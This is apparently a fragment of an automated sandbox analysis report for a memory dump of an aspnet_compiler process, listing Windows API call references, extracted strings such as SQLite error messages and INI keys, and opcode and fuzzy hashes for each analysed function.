                                                                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2163313125-0
                                                                                                                                                                                                                                                                  • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                                                                  • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@$wcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 239872665-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                                                                                                                                  • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                                                                  • String ID: %s (%s)$YV@
                                                                                                                                                                                                                                                                  • API String ID: 3979103747-598926743
                                                                                                                                                                                                                                                                  • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                                                                  • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                                                                  • API String ID: 2767993716-572158859
                                                                                                                                                                                                                                                                  • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                                                                                  • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                                                                  • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                                                                  • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                                                                                  • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                                                                                  • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                                                                                  • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                                                                                  • out of memory, xrefs: 0042F865
                                                                                                                                                                                                                                                                  • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                                                                                  • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                                                                  • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                                                                  • Opcode ID: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                                                                                                                  • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040EB80
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040EB94
                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                                                                  • String ID: ($d
                                                                                                                                                                                                                                                                  • API String ID: 1140211610-1915259565
                                                                                                                                                                                                                                                                  • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                                                                                                  • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                                                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3015003838-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                                                                  • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                                                                  • _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                                                                                                  • _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                                                                                                  • _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                                                                                                  • _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 59245283-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                                                                  • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3467550082-0
                                                                                                                                                                                                                                                                  • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                                                                  • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                                                                  • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                                                                  • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                                                                  • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                                                                                    • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                                                                  • String ID: 3A
                                                                                                                                                                                                                                                                  • API String ID: 3300951397-293699754
                                                                                                                                                                                                                                                                  • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                                                                  • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                                                                  • String ID: strings
                                                                                                                                                                                                                                                                  • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                                                                  • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                                                                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                                                                  • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                                                                                  • API String ID: 776488737-1622828088
                                                                                                                                                                                                                                                                  • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                                                                                  • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                                                                                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                                                                                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                                                                  • String ID: sysdatetimepick32
                                                                                                                                                                                                                                                                  • API String ID: 1028950076-4169760276
